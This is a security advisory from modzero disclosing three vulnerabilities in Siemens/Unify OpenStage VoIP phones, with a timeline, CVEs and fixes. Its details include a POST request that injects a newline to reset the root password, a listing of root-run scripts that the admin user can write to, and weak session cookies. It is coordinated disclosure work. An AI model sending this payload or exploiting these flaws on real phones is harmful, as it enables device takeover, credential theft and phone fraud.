--------------------------------------------------------------------- modzero Security Advisory: Multiple Vulnerabilities in Siemens OpenStage VoIP Phones [MZ-14-02] --------------------------------------------------------------------- --------------------------------------------------------------------- 1. Timeline --------------------------------------------------------------------- * 2014-07-15: Vulnerability has been discovered. * 2014-09-15: Siemens has been contacted. * 2014-09-15: Response from Siemens referring to Unify as new product owner * 2014-09-15: Unify has been contacted. * 2014-09-16: Initial feedback by Unify * 2014-12-19: Status update by Unify * 2015-02-26: Unify published an Advisory * 2015-06-05: modzero published updated advisory --------------------------------------------------------------------- 2. Summary --------------------------------------------------------------------- Vendor: Siemens, Unify Products known to be affected: * Siemens OpenStage 20, 40, 60 Software release: At least OperaVersion 3.1.35.0000 (OpenStage 60) * Certain Unify products: OpenStage SIP, OpenScape Desk Phone IP SIP Severity: Low Remote exploitable: Partially The Siemens OpenStage VoIP phones run a Busybox-Linux. The phones use and offer several network services, including SSH access (after activation), an admin Web interface and SIP signaling. modzero identified several weaknesses: an input validation vulnerability, as well as a file permission vulnerability that allows a privilege escalation. --------------------------------------------------------------------- 3. Details --------------------------------------------------------------------- 3.1 Input Validation Vulnerability via Web Interface (Severity: Low) * CVE-2014-9563 * Products known to be affected: * Siemens OpenStage 20, 40, 60 Software release: At least OperaVersion 3.1.35.0000 (OpenStage 60) * OpenStage / OpenScape Desk Phone IP SIP in V3 before V3 R3.32.0 To set the admin password for SSH access, the web interface code calls the local shell-script "/Opera_Deploy/setPasswd.sh", which runs the Linux command "chpasswd" to perform a password re-set. Input parameters that are passed from the Web interface to "chpasswd" are not correctly validated allowing an attacker with access to the admin frontend to set the passwords for more privileged system users on the phone which is not intended with the standard user-interface. Thus, this vulnerability allows for a privilege escalation attack. An example POST request to the phone's built-in Web server is shown below. Afterwards, the "root" user's password is set, too. --- POST /page.cmd HTTP/1.1 Host: 10.0.23.42 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.23.42/page.cmd?page=WEBM_Admin_SecureShell&lang=de Cookie: webm=0000|4b766b55-53c3d261 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 134 page_submit=WEBM_Admin_SecureShell&lang=de&ssh-enable=true&ssh-password=123456%0aroot:123456&ssh-timer-connect=10&ssh-timer-session=60 --- 3.2 Privilege Escalation via SSH (Severity: Low) * CVE-2014-8421 * Products known to be affected: * Siemens OpenStage 20, 40, 60 Software release: At least OperaVersion 3.1.35.0000 (OpenStage 60) * OpenStage SIP before V3 R1.49.0 (release date: 2013-11-15) * OpenScape Desk Phone IP SIP before V3 R2.16.0 (release date: 2013-12-12) After activating the shell access, a user may log in as user "admin" via Secure Shell. The user will not have super- user privileges. However, the Web interface is based on several CGI scripts, which are executed with super-user privileges, while scripts as well as the directory "/Opera_Deploy/appWeb" are writeable for the user "admin". This allows a privilege escalation, because a less privileged user can gain super user permissions by writing malicious code into poorly protected files, that will be called with maximum privileges afterwards. The following list of scripts is called with super-user privileges while being writable for user "admin": --- $ ls -l /Opera_Deploy/*.sh -rw-rw-r-- 1 admin admin 20 Jan 1 2000 /Opera_Deploy/ConfigureCoreFile.sh -rwxrwxr-x 1 admin admin 64 Oct 1 2012 /Opera_Deploy/Traceroute.sh -rwxrwxr-x 1 admin admin 538 Oct 1 2012 /Opera_Deploy/apps.sh -rwxrwxr-x 1 admin admin 2162 Oct 1 2012 /Opera_Deploy/conversion_java2native.sh -rw-rw-r-- 1 admin admin 1321 Oct 1 2012 /Opera_Deploy/coreCompression.sh -rwxrwxr-x 1 admin admin 26 Oct 1 2012 /Opera_Deploy/deletePasswd.sh -rwxrwxr-x 1 admin admin 229 Oct 1 2012 /Opera_Deploy/findHealthSvcFDs.sh -rwxrwxr-x 1 admin admin 54 Oct 1 2012 /Opera_Deploy/fw_printenv.sh -rwxrwxr-x 1 admin admin 35 Oct 1 2012 /Opera_Deploy/fw_setenv.sh -rw-rw-r-- 1 admin admin 553 Oct 1 2012 /Opera_Deploy/hw_wd_kicker.sh -rwxrwxr-x 1 admin admin 16621 Oct 1 2012 /Opera_Deploy/new_rootfs.sh -rw-rw-r-- 1 admin admin 63 Oct 1 2012 /Opera_Deploy/opera_killSnmpd.sh -rw-rw-r-- 1 admin admin 100 Oct 1 2012 /Opera_Deploy/opera_startSnmpd.sh -rwxrwxr-x 1 admin admin 10372 Oct 1 2012 /Opera_Deploy/rebootOperaSoftware.sh -rwxrwxr-x 1 admin admin 180 Oct 1 2012 /Opera_Deploy/removeLogFiles.sh -rwxrwxr-x 1 admin admin 192 Oct 1 2012 /Opera_Deploy/runOperaServices.sh -rwxrwxr-x 1 admin admin 199 Oct 1 2012 /Opera_Deploy/setPasswd.sh -rwxrwxr-x 1 admin admin 163 Oct 1 2012 /Opera_Deploy/startAccTestSvcs.sh -rwxrwxr-x 1 admin admin 2056 Oct 1 2012 /Opera_Deploy/usbNotification.sh --- 3.3 Weak Session IDs (Severity: Low) * CVE-2014-8422 * Products known to be affected: * Siemens OpenStage 20, 40, 60 Software release: At least OperaVersion 3.1.35.0000 (OpenStage 60) * OpenStage SIP before V3 R0.48.0 (release date: 2011-09-30) The web interface uses session cookies to keep track of authenticated sessions for regular and administrative users. The cookie shows only little entropy. The only random part is the 32 bit number, which should usually not be guessed with a brute-force approach within reasonable time. However, modzero still considers the random part of the session cookie being too small. Depending on the user and authentication state, the following cookie formats are used. "n" represents hexadecimal figures: * Unauthenticated cookie: webm=0000|0000 * User cookie: webm=nnnnnnnn-nnnnnnnn|0000 * Admin cookie: webm=0000|nnnnnnnn-nnnnnnnn After logging in, session IDs have only little entropy as the following examples for admin cookies show: Cookie: webm=0000|4b766b55-53c3d261 Cookie: webm=0000|42a1166b-53c3da35 Cookie: webm=0000|734d2952-53c3dabc The right part consists of a 32 bit random number and a 32 bit timestamp. The timestamp has only a limited amount of entropy and may be narrowed down - especially if an attacker can passively observe network traffic. --------------------------------------------------------------------- 4. Impact --------------------------------------------------------------------- These vulnerabilities may be used to gain privileged access on OpenStage phones. This may result in a compromise of the phone setup, stolen SIP account credentials, phone-fraud and exfiltration of phone calls. --------------------------------------------------------------------- 5. Workaround / Fix --------------------------------------------------------------------- modzero recommends upgrading to the latest software version. The reported issues were fixed with OpenStage SIP V3 R3.32.0. Furthermore, modzero recommends using complex passwords for administrative interfaces and if possible to disable/filter them. It is also highly recommended, to separate the phones from regular networks to limit access to vulnerable devices from other networks and vice versa. --------------------------------------------------------------------- 6. Credits --------------------------------------------------------------------- Discovery: * Martin Schobert (martin@modzero.ch) * Thorsten Schröder (ths@modzero.ch) Thanks to Stefan Beck (OpenScape Baseline Security Office) for coordinating this issue. --------------------------------------------------------------------- 7. References --------------------------------------------------------------------- * OBSO-1501-02 https://networks.unify.com/security/advisories/OBSO-1501-02.pdf --------------------------------------------------------------------- 8. About modzero --------------------------------------------------------------------- The independent Swiss company modzero AG assists clients with security analysis in the complex areas of computer technology. The focus lies on highly detailed technical analysis of concepts, software and hardware components as well as the development of individual solutions. Colleagues at modzero AG work exclusively in practical, highly technical computer-security areas and can draw on decades of experience in various platforms, system concepts, and designs. https://www.modzero.ch contact@modzero.ch --------------------------------------------------------------------- 9. Disclaimer --------------------------------------------------------------------- The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.